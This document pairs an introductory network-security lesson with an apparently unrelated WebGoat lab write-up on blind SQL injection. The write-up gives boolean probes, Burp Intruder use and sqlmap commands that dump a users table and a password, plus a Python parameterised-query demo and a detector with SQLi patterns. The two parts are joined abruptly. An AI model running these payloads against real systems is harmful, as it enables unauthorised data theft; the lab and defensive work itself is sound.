Task – 1

Introduction: Understand the basics of network security by learning about different types of network threats and how to implement basic security measures. This task will introduce you to the foundational concepts of securing a small network.
Types of Network Threats

1. Viruses
   - Definition: Malicious software that attaches itself to a host file or program and spreads when the host is executed.
   - Propagation: Viruses require human action to spread, such as downloading an infected file or executing a malicious attachment.
   - Impact: Can corrupt or delete files, steal personal data, and cause system failures.

2. Worms
   - Definition: Self-replicating malware that spreads across networks without needing a host file.
   - Propagation: Exploits vulnerabilities in network services and spreads through local or wide-area networks.
   - Impact: Can cause network congestion, overload servers, and allow attackers to install backdoors.

3. Trojans
   - Definition: Malicious software disguised as legitimate software. Users unknowingly execute the malware.
   - Propagation: Trojans are often spread through downloads or email attachments.
   - Impact: Once installed, they can give attackers control of the system, steal information, or install other malware.

4. Phishing Attacks
   - Definition: A form of social engineering where attackers trick individuals into providing sensitive information (like passwords or credit card details) by pretending to be legitimate entities.
   - Propagation: Often occurs via email, instant messaging, or fake websites that resemble trusted organizations.
   - Impact: Can result in identity theft, financial loss, or compromise of sensitive data.

Basic Security Concepts

1. Firewalls
   - Definition: A security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
   - Types:
     - Network firewalls: These filter traffic between different networks, such as the internet and an internal network.
     - Host-based firewalls: Installed on individual devices to filter traffic coming into and leaving the device.
   - Purpose: Prevent unauthorized access to or from a network while allowing legitimate communication.

2. Encryption
   - Definition: The process of converting data into an unreadable format (ciphertext) to prevent unauthorized access.
   - Types:
     - Symmetric encryption: Uses the same key for encryption and decryption.
     - Asymmetric encryption: Uses a pair of public and private keys for encryption and decryption.
   - Purpose: Protects data integrity and confidentiality during storage or transmission.

3. Secure Network Configurations
   - Definition: Proper setup and management of network devices to minimize vulnerabilities.
   - Elements:
     - Segmentation: Isolating sensitive parts of a network to limit access.
     - Secure Protocols: Using encrypted communication protocols (e.g., HTTPS, SSL/TLS, SSH) to ensure secure data transmission.
     - Regular Patch Management: Keeping network hardware and software up-to-date to avoid exploitation of vulnerabilities.
   - Purpose: Reduces the attack surface and prevents exploitation of misconfigurations or outdated software.
Understanding these threats and implementing strong security measures like firewalls, encryption, and secure configurations helps in creating a robust network defense strategy.
As both the registration and the login worked fine with the new user, I can assume that the form values I sent for these two operations were resulting in valid SQL queries.
So what happens if I send them again with an SQLi test attached?
newuser' AND '1'='1
From this response I understand that the app checks whether the username already exists by running the query we provided, so this statement is a valid TRUE statement since the username already exists.
newuser' and '1'='2
Hence this is a valid FALSE statement.
This is all we need to ask the database for all of its data, as long as the db user is allowed to read it.
In lesson #4 we were given a hint on this problem:
AND substring(database_version(),1,1) = '2
By varying the position argument of substring() and the literal value, we can loop through every position and see which character matches. Subsequent character positions of the database value can be found with Burp Intruder: run a sniper attack on the §2§ payload position with a list such as https://github.com/xmendez/wfuzz/blob/master/wordlist/stress/alphanum_case_extra.txt and see which request returns a TRUE response.
The database_version() value is 2.5.0 on my WebGoat install.
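To show why the registration check behaves as a TRUE/FALSE oracle, here is an added example (not WebGoat's code) that rebuilds the username-exists check in Python, once with string concatenation and once with a bound parameter, over an in-memory SQLite table standing in for the HSQLDB one; substr()/sqlite_version() stand in for substring()/database_version(), and the table contents are constructed.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge's CHALLENGE_USERS table
# (SQLite here; the real WebGoat lesson runs on HSQLDB).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE challenge_users (userid TEXT, password TEXT)")
    db.executemany("INSERT INTO challenge_users VALUES (?, ?)",
                   [("tom", "constructed-secret"), ("newuser", "constructed-pw")])
    return db

def user_exists_vulnerable(db, username):
    # String concatenation: whatever follows the closing quote in the username
    # becomes part of the SQL grammar, so the "username already exists" vs
    # "registration OK" response leaks the outcome of any injected condition.
    # This reproduces the behaviour observed in the write-up.
    sql = "SELECT 1 FROM challenge_users WHERE userid = '" + username + "'"
    return db.execute(sql).fetchone() is not None

def user_exists_safe(db, username):
    # Bound parameter: the whole string is compared as a literal value and
    # can never change the structure of the query.
    sql = "SELECT 1 FROM challenge_users WHERE userid = ?"
    return db.execute(sql, (username,)).fetchone() is not None

# The probes from the write-up; SQLite's substr()/sqlite_version() stand in
# for HSQLDB's substring()/database_version() (SQLite versions start with "3").
PROBES = [
    "newuser' AND '1'='1",
    "newuser' AND '1'='2",
    "newuser' AND substr(sqlite_version(),1,1)='3",
    "newuser' AND substr(sqlite_version(),1,1)='9",
]

def compare(db, probes=PROBES):
    """Return {probe: (vulnerable_result, parameterised_result)} for each probe."""
    return {p: (user_exists_vulnerable(db, p), user_exists_safe(db, p)) for p in probes}

if __name__ == "__main__":
    for probe, (vuln, safe) in compare(make_db()).items():
        print(f"{probe!r:50} vulnerable={vuln!s:5} parameterised={safe}")
```

With the parameterised check every probe returns False simply because no user is literally named `newuser' AND '1'='1`, so the response no longer depends on the injected condition and the oracle disappears.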
I then wanted to automate with sqlmap and see what I could get from the db.
The simplest way I know to give sqlmap a proper request is to:
1. submit the initial request from the browser and get the response for a TRUE statement
2. copy both from Burp
3. use the request as the input file and the response text as the --string parameter that identifies a TRUE statement in sqlmap

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads 1
sqlmap output: the current DB is PUBLIC and the injection is boolean-based blind SQL.
Let's try to get the table names:

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=10 --technique=B --dbms="HSQLDB" -D PUBLIC --tables --level=5 --risk=3
I would then start by looking at the CHALLENGE_USERS table:

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS --columns --level=5 --risk=3

sqlmap asks permission to brute-force the column names with its wordlist, and then shows the result.
Then get the table rows. This time I had to lower the number of threads because of the number of errors I was getting with 10 threads on my machine:

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS -C userid,password --dump --level=5 --risk=3

The CHALLENGE_USERS dump, including Tom's password.
Now we have the username and password for Tom and can log in on the lesson's login form.
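Seen from the defender's side, the sqlmap run above leaves a recognisable trace: form values shaped like the probes in this write-up, sqlmap's self-identifying default User-Agent (unless the operator overrides it), and a burst of near-identical requests to the registration endpoint. The detector below is an added example, not part of the write-up or of WebGoat; it runs those three checks over a constructed JSON-lines application log whose format, addresses, timestamps and values are all assumptions.

```python
import json
import re
from collections import defaultdict

# Probe shapes from the write-up: a closed quote followed by AND/OR and a
# comparison, or a substring()/database_version() call inside a form field.
PROBE_RE = re.compile(r"'\s*\b(and|or)\b\s+.*=|substring\s*\(|database_version\s*\(", re.I)

# Constructed JSON-lines application log of registration requests to the
# WebGoat challenge; format, addresses, timestamps and values are assumptions.
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"ts": 0, "src": "10.0.0.9", "path": "/challenge/5", "ua": "Mozilla/5.0",
     "params": {"username_reg": "alice"}},
    {"ts": 1, "src": "10.0.0.5", "path": "/challenge/5", "ua": "Mozilla/5.0",
     "params": {"username_reg": "newuser' AND '1'='1"}},
    {"ts": 2, "src": "10.0.0.5", "path": "/challenge/5", "ua": "Mozilla/5.0",
     "params": {"username_reg": "newuser' and substring(database_version(),1,1)='2"}},
] + [  # a sqlmap-style burst of one-condition-per-request probes
    {"ts": 5 + i, "src": "10.0.0.5", "path": "/challenge/5",
     "ua": "sqlmap/1.7 (https://sqlmap.org)",
     "params": {"username_reg": f"newuser' AND {i}={i}"}} for i in range(30)
])

def analyse(log_text, burst_threshold=20, window=60):
    """Return {src: set(reasons)} for sources whose traffic looks like blind-SQLi probing."""
    findings = defaultdict(set)
    timestamps = defaultdict(list)          # (src, path) -> request times
    for line in log_text.splitlines():
        rec = json.loads(line)
        if any(PROBE_RE.search(v) for v in rec["params"].values()):
            findings[rec["src"]].add("sqli-probe-pattern")
        if "sqlmap" in rec["ua"].lower():   # default UA; absent if --random-agent was used
            findings[rec["src"]].add("sqlmap-user-agent")
        timestamps[(rec["src"], rec["path"])].append(rec["ts"])
    # Burst rule: `burst_threshold` requests to one endpoint from one source
    # within `window` seconds, the shape of character-by-character extraction.
    for (src, _path), times in timestamps.items():
        times.sort()
        for i in range(burst_threshold - 1, len(times)):
            if times[i] - times[i - burst_threshold + 1] <= window:
                findings[src].add("request-burst")
                break
    return dict(findings)

if __name__ == "__main__":
    for src, reasons in analyse(SAMPLE_LOG).items():
        print(src, sorted(reasons))
```

The burst rule is the one that still fires when the operator hides the User-Agent and obfuscates the payload, since boolean-blind extraction needs one request per candidate character; tune burst_threshold and window to the endpoint's normal registration rate.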